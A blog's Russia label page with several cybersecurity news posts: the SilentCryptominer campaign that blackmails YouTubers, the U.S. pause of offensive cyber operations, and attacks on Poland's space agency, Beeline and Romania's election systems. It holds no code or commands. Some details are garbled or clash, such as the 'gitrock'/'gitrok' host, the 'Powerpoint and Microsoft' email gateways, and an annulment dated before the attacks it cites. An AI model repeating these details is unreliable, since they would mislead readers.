Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Russia. Show all posts
Youtube
Blackmail Internet malware Russia SilentCryptominer Social Media Youtube

SilentCryptominer Threatens YouTubers to Post Malware in Videos

SilentCryptominer Threatens YouTubers to Post Malware in Videos

Experts have discovered an advanced malware campaign that exploits the rising popularity of Windows Packet Divert drivers to escape internet checks.

Malware targets YouTubers 

Hackers are spreading SilentCryptominer malware hidden as genuine software. It has impacted over 2000 victims in Russia alone. The attack vector involves tricking YouTubers with a large follower base into spreading malicious links. 

“Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives,” reports Secure List. This helps threat actors by “allowing them to persist in an unprotected system without the risk of detection. 

Innocent YouTubers Turned into victims

Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency.” Few commonly found malware in the distribution scheme are: Phemedrone, DCRat NJRat, and XWorm.

In one incident, a YouTuber with 60k subscribers had put videos containing malicious links to infected archives, gaining over 400k views. The malicious links were hosted on gitrock[.]com, along with download counter crossing 40,000. 

The malicious files were hosted on gitrok[.]com, with the download counter exceeding 40,000.

Blackmail and distributing malware

Threat actors have started using a new distribution plan where they send copyright strikes to content creators and influencers and blackmail them to shut down channels if they do not post videos containing malicious links. The scare strategy misuses the fame of the popular YouTubers to distribute malware to a larger base. 

The infection chain starts with a manipulated start script that employs an additional executable file via PowerShell. 

As per the Secure List Report, the loader (written in Python) is deployed with PyInstaller and gets the next-stage payload from hardcoded domains.  The second-stage loader runs environment checks, adds “AppData directory to Microsoft Defender exclusions” and downloads the final payload “SilentCryptominer.”

The infamous SilentCryptoMiner

The SilentCryptoMiner is known for mining multiple cryptocurrencies via different algorithms. It uses process hollowing techniques to deploy miner code into PCs for stealth.

The malware can escape security checks, like stopping mining when processes are running and scanning for virtual environment indicators. 

Read more »
Russia cyber threats
Cyber Defence Cyber Security Cyber Warfare FBI Russia Russia cyber threats

U.S. Pauses Offensive Cyberoperations Against Russia Amid Security Concerns

 

Defense Secretary Pete Hegseth has paused offensive cyberoperations against Russia by U.S. Cyber Command, rolling back some efforts to contend with a key adversary even as national security experts call for the U.S. to expand those capabilities. A U.S. official, speaking on condition of anonymity to discuss sensitive operations, on Monday confirmed the pause. 

Hegseth’s decision does not affect cyberoperations conducted by other agencies, including the CIA and the Cybersecurity and Infrastructure Security Agency. But the Trump administration also has rolled back other efforts at the FBI and other agencies related to countering digital and cyber threats. The Pentagon decision, which was first reported by The Record, comes as many national security and cybersecurity experts have urged greater investments in cyber defense and offense, particularly as China and Russia have sought to interfere with the nation’s economy, elections and security. 

Republican lawmakers and national security experts have all called for a greater offensive posture. During his Senate confirmation hearing this year, CIA Director John Ratcliffe said America’s rivals have shown that they believe cyberespionage — retrieving sensitive information and disrupting American business and infrastructure — to be an essential weapon of the modern arsenal. “I want us to have all of the tools necessary to go on offense against our adversaries in the cyber community,” Ratcliffe said. Cyber Command oversees and coordinates the Pentagon’s cybersecurity work and is known as America’s first line of defense in cyberspace. It also plans offensive cyberoperations for potential use against adversaries. 

Hegseth’s directive arrived before Friday’s dustup between President Donald Trump and Ukrainian President Volodymyr Zelenskyy in the Oval Office. It wasn’t clear if the pause was tied to any negotiating tactic by the Trump administration to push Moscow into a peace deal with Ukraine. Trump has vowed to end the war that began when Russia invaded Ukraine three years ago, and on Monday he slammed Zelenskyy for suggesting the end to the conflict was “far away.” 

The White House did not immediately respond to questions about Hegseth's order. Cyber warfare is cheaper than traditional military force, can be carried out covertly and doesn’t carry the same risk of escalation or retaliation, making it an increasingly popular tool for nations that want to contend with the U.S. but lack the traditional economic or military might, according to Snehal Antani, CEO of Horizon3.ai, a San Francisco-based cybersecurity firm founded by former national security officers. Cyberespionage can allow adversaries to steal competitive secrets from American companies, obtain sensitive intelligence or disrupt supply chains or the systems that manage dams, water plants, traffic systems, private companies, governments and hospitals. The internet has created new battlefields, too, as nations like Russia and China use disinformation and propaganda to undermine their opponents. 

Artificial intelligence now makes it easier and cheaper than ever for anyone — be it a foreign nation like Russia, China or North Korea or criminal networks — to step up their cybergame at scale, Antani said. Fixing code, translating disinformation or identifying network vulnerabilities once required a human — now AI can do much of it faster. “We are entering this era of cyber-enabled economic warfare that is at the nation-state level,” Antani said. “We’re in this really challenging era where offense is significantly better than defense, and it’s going to take a while for defense to catch up.” Meanwhile, Attorney General Pam Bondi also has disbanded an FBI task force focused on foreign influence campaigns, like those Russia used to target U.S. elections in the past. And more than a dozen people who worked on election security at the Cybersecurity and Infrastructure Security Agency were put on leave. 

These actions are leaving the U.S. vulnerable despite years of evidence that Russia is committed to continuing and expanding its cyber efforts, according to Liana Keesing, campaigns manager for technology reform at Issue One, a nonprofit that has studied technology’s impact on democracy. “Instead of confronting this threat, the Trump administration has actively taken steps to make it easier for the Kremlin to interfere in our electoral processes,” Keesing said.
Read more »
Russia cyber threats
Cyber Security Cybersecurity Russia Russia cyber threats

Trump Administration Halts Offensive Cyber Operations Against Russia Amid Ukraine War Talks

 

The Trump administration has issued orders to suspend U.S. offensive cyber operations targeting Russia, a move reportedly aimed at encouraging Russian President Vladimir Putin to engage in diplomatic discussions over the war in Ukraine. According to The Record, U.S. Defense Secretary Pete Hegseth directed the halt, which is expected to remain in place indefinitely. 

This decision comes in the wake of a heated Oval Office dispute on Friday between President Donald Trump, Vice President JD Vance, and Ukrainian President Volodymyr Zelensky over continued U.S. financial and military support for Ukraine. The previous Biden administration had strongly backed Ukraine, committing billions of dollars in aid and weaponry to counter Russian aggression. 

However, the Trump administration’s shift in stance has raised uncertainty regarding America’s future role in the conflict. Meanwhile, British Prime Minister Keir Starmer announced on Sunday that European nations would establish a “coalition of the willing” to continue providing support to Ukraine. 

The extent of the U.S. cyber operations suspension remains unclear, but officials stress that understanding Russia’s objectives in Ukraine is crucial for assessing Moscow’s broader geopolitical strategy, particularly in the realm of cyber espionage. 

Hegseth’s directive is reportedly part of a larger reassessment of Washington’s involvement in the war and its broader operations against Russia. While intelligence-gathering activities remain unaffected, the decision to halt offensive cyber operations is seen as a calculated risk. Trump has previously blamed Ukraine for the war and has labeled Zelensky a “dictator” who, in his view, is “not ready for peace.”
Read more »
Russia
Aerospace Cyber Attacks Europe Poland Russia

Poland’s Space Agency Investigates Cyberattack, Works On Security Measures

 



Poland’s space agency, POLSA, has reported a cyberattack on its systems, prompting an ongoing investigation. In response to the breach, the agency quickly disconnected its network from the internet to prevent further damage. As of Monday, its official website was still offline.  


Government and Cybersecurity Teams Take Action

Poland’s Minister of Digital Affairs, Krzysztof Gawkowski, confirmed that cybersecurity experts detected unauthorized access to POLSA’s systems. Security specialists have since secured the affected infrastructure and are now working to determine who was behind the attack. However, officials have not yet shared whether the hackers were financially motivated cybercriminals or politically driven groups. The method used to infiltrate the agency’s network also remains undisclosed.  


Why Hackers Target Space Agencies

Organizations involved in space research and technology are often appealing targets for cybercriminals. Many of these agencies collaborate with defense and intelligence sectors, making them vulnerable to attacks that could expose confidential projects, satellite communications, and security-related data. A cyberattack on such an agency could disrupt critical operations, leak classified research, or even interfere with national security.  


Poland Faces a Surge in Cyberattacks

Poland has become one of the most frequently targeted countries in the European Union when it comes to cyber threats. Earlier this year, Gawkowski stated that the country experiences more cyber incidents than any other EU nation, with most attacks believed to be linked to Russian actors. Poland’s strong support for Ukraine, both in military assistance and humanitarian aid, has likely contributed to this rise in cyber threats.  

The number of cyberattacks against Poland has increased drastically in recent years. Reports indicate that attacks doubled in 2023 compared to previous years, with over 400,000 cybersecurity incidents recorded in just the first half of the year. In response, the Polish government introduced a cybersecurity initiative in June, allocating $760 million to strengthen the country’s digital defenses.  


Other Space Agencies Have Also Been Targeted

This is not the first time a space agency has fallen victim to cyberattacks. Japan’s space agency, JAXA, has faced multiple breaches in the past. In 2016, reports suggested that JAXA was among 200 Japanese organizations targeted by suspected Chinese military hackers. In 2023, unknown attackers infiltrated the agency’s network, raising concerns that sensitive communications with private companies, such as Toyota, may have been exposed.  

As space technology continues to advance, protecting space agencies from cyber threats has become more crucial than ever. These organizations handle valuable and often classified information, making them prime targets for espionage, sabotage, and financial cybercrime. If hackers manage to breach their systems, the consequences could be severe, ranging from stolen research data to disruptions in satellite operations and defense communications.  

POLSA’s ongoing investigation will likely uncover more details about the cyberattack in the coming weeks. For now, the incident highlights the increasing need for governments and space organizations to invest in stronger cybersecurity measures to protect critical infrastructure.

Read more »
Telecom
Beeline Cyber Attacks DDOS Attacks Internet Russia Telecom

Russian Telecom Company "Beeline" Hit, Users Face Internet Outage

Russian Telecom Company "Beeline" Hit, Users Face Internet Outage

Internet outage in, telecom provider attacked

Users in Russia faced an internet outage in a targeted DDoS attack on Russian telecom company Beeline. This is the second major attack on the Moscow-based company in recent weeks; the provider has over 44 million subscribers.

After several user complaints and reports from outage-tracking services, Beeline confirmed the attack to local media.

According to Record Media, internet monitoring service Downdetector’s data suggests “most Beeline users in Russia faced difficulties accessing the company’s mobile app, while some also reported website outages, notification failures and internet disruptions.” 

Impact on Beeline

Beeline informed about the attack on its Telegram channel, stressing that the hacker did not gain unauthorized access to consumer data. Currently, the internet provider is restoring all impacted systems and improving its cybersecurity policies to avoid future attacks. Mobile services are active, but users have cited issues using a few online services and account management features.

Rise of threat in Russia

The targeted attack on Beeline is part of a wider trend of cyberattacks in Russia; in September 2024, VTB, Russia’s second-largest bank, faced similar issues due to an attack on its infrastructure. 

These attacks highlight the rising threats posed by cyberattacks cherry-picking critical infrastructures in Russia and worldwide.

Experts have been warning about the rise in intensity and advanced techniques of such cyberattacks, damaging not only critical businesses but also essential industries that support millions of Russian citizens. 

Telecom companies in Russia targeted

How Beeline responds to the attack and recovers will be closely observed by both the telecom industry and regulators. The Beeline incident is similar to the attack on Russian telecom giant Megafon, another large-scale DDoS attack happened earlier this year. 

According to a cybersecurity source reported by Forbes Russia, the Beeline attack in February and the Megafon incident in January are the top hacktivist cyberattacks aiming at telecom sectors in 2025. 

According to the conversation with Forbes, the source said, “Both attacks were multi-vector and large-scale. The volume of malicious traffic was identical, but MegaFon faced an attack from 3,300 IP addresses, while Beeline was targeted via 1,600, resulting in a higher load per IP address.”

Read more »
Trojan
Cyber Security Google AMP Phishing Attacks RATs Russia TikTok Trojan

Hackers Use Russian Domains for Phishing Attacks

Hackers Use Russian Domains for Phishing Attacks

The latest research has found a sharp rise in suspicious email activities and a change in attack tactics. If you are someone who communicates via email regularly, keep a lookout for malicious or unusual activities, it might be a scam. The blog covers the latest attack tactics threat actors are using.

Malicious email escapes SEGs

Daily, at least one suspicious email escapes Secure Email Getaways (SEGs), like Powerpoint and Microsoft, every 45 seconds, showing a significant rise from last year’s attack rate of one of every 57 seconds, according to the insights from Cofense Intelligence’s third-quarter report.

A sudden increase in the use of remote access Trojans (RATs) allows hackers to gain illegal access to the target’s system, which leads to further abuse, theft, and data exploitation.

Increase in Remote Access Trojan (RAT) use

Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.

According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.

Using TikTok and Google AMP

TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unknowing users.

The use of malicious Office documents, particularly those in.docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.

Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.

Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of.ru and.su top-level domains (TLDs). Domains with the.ru (Russia) and.su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating cybercriminals are turning to less common and geographically associated domains to evade detection and make it more difficult for victims and security teams to track data theft activities.

Read more »
SQL
Cyber Attacks Data Security Tiktok Election Security Elections Infrastructure Romania Russia Security Breaches SQL

Romania Annuls Elections After TikTok Campaign and Cyberattacks Linked to Russia

 


Romania’s Constitutional Court (CCR) has annulled the first round of its recent presidential elections after intelligence reports revealed extensive foreign interference. Cyberattacks and influence campaigns have raised serious concerns, prompting authorities to reschedule elections while addressing security vulnerabilities. 
  
Cyberattacks on Election Infrastructure

The Romanian Intelligence Service (SRI) uncovered relentless cyberattacks targeting key election systems between November 19th and November 25th. Attackers exploited vulnerabilities to compromise platforms such as:
  • Bec.ro: Central Election Bureau system.
  • Registrulelectoral.ro: Voter registration platform.
Key findings include:
  • Methods Used: SQL injection and cross-site scripting (XSS) exploited to infiltrate systems.
  • Leaked Credentials: Stolen login details shared on Russian cybercrime forums.
  • Server Breach: A compromised server linked to mapping data allowed access to sensitive election infrastructure.
  • Origin: Attacks traced to devices in over 33 countries, suggesting state-level backing.
While the SRI has not explicitly named Russia, the attack methods strongly indicate state-level involvement. TikTok Influence Campaign Beyond cyberattacks, a coordinated TikTok influence campaign sought to sway public opinion in favor of presidential candidate Calin Georgescu:
  • Influencers: Over 100 influencers with a combined 8 million followers participated.
  • Payments: Ranged from $100 for smaller influencers to substantial sums for those with larger followings.
  • Impact: Pro-Georgescu content peaked on November 26th, ranking 9th among TikTok’s top trending videos.
  • Activity Pattern: Many accounts involved were dormant since 2016 but became active weeks before the election.
Romania’s Ministry of Internal Affairs (MAI) noted parallels between Georgescu’s messaging and narratives supporting pro-Russian candidates in Moldova, further tying the campaign to Russian influence efforts. Geopolitical Implications Romania’s Foreign Intelligence Service (SIE) linked these actions to a broader Russian strategy to destabilize NATO-aligned countries:

Goals: Undermine democratic processes and promote eurosceptic narratives.

Target: Romania’s significant NATO presence makes it a critical focus of Russian propaganda and disinformation campaigns.

Election Annulment and Future Challenges 
 
On November 6th, the CCR annulled the election’s first round, citing security breaches and highlighting vulnerabilities in Romania’s electoral infrastructure. Moving forward:
  • Cybersecurity Enhancements: Authorities face mounting pressure to strengthen defenses against similar attacks.
  • Disinformation Countermeasures: Efforts to combat influence campaigns are essential to safeguarding future elections.
  • Warning from SRI: Election system vulnerabilities remain exploitable, raising concerns about upcoming elections.
The incidents in Romania underscore the rising threat of cyberattacks and influence operations on democratic processes worldwide, emphasizing the urgent need for robust security measures to protect electoral integrity.
Read more »
Russia
Attack Campaign Cyber Attacks Data Leak Election Romania Russia

Romania's Election System Hit by Over 85,000 Cyberattacks, Russian Links Suspected


Romania’s intelligence service in its declassified report disclosed the country’s election systems were hit by over 85,000 cyberattacks. Attackers have also stolen login credentials for election-related sites and posted the information on a Russian hacker forum just before the first presidential election round. 

Data leaked on Russian site

The data was likely stolen from attacking authentic users and exploiting legitimate training servers. Russia has denied any involvement in Romania’s election campaign.

The Romanian Intelligence Service (SRI) said, “The attacks continued intensively including on election day and the night after elections. The operating mode and the amplitude of the campaign lead us to conclude the attacker has considerable resources specific to an attacking state."

About the attack

SRI says the IT infrastructure of Romania’s Permanent Electoral Authority (AEP) was targeted on 19th November. Threat actors disrupted a server containing mapping data (gis.registrulelectoral.ro) that was connected with the public web as well as AEP’s internal network.

After the attack, log in details of Romanian election websites- bec.ro (Central Election Bureau), roaep.ro, and registrulelectoral.ro (voter registration), were posted on a Russian cybercrime platform.

Motives for the attack

SRI believes the attacks 85,000 attacks lasted till November 25th, the motive was to gain access to election infrastructure and disrupt the systems to compromise election information for the public and restrict access to the systems. The declassified report mentions the attacker attempted to compromise the systems by exploiting SQL injection and cross-site scripting (XSS) flaws from devices in 33 countries. 

Romanian agency has warned that bugs are still affecting the election infrastructure and could be abused to move within the network and build a presence.

SRI notes in the declassified report that the threat actor tried to breach the systems by exploiting SQL injection and cross-site scripting (XSS) vulnerabilities from devices in more than 33 countries.

Influence campaign on elections

SRI believes Russia orchestrated the attacks as a part of a larger plan to disrupt democratic elections in Eastern Europe. The agency says Moscow perceives Romania as an ‘enemy nation’ because the latter supports NATO and Ukraine. The influence campaign tactics include disinformation, propaganda, and supporting European agendas shaping public opinion. 

Romania’s Foreign Intelligence Service (SIE) believes Russia targeted the country as part of broader efforts to influence democratic elections in Eastern Europe. Moscow views Romania as an “enemy state” due to its support for NATO and Ukraine. These influence operations include propaganda, disinformation, and support for eurosceptic agendas, aiming to shape public opinion favoring Russia. 

While there is no concrete proof showing Russia’s direct involvement in Romanian elections, the declassified document suggests Russia’s history of election meddling in other places.

Read more »
Subscribe to: Posts (Atom)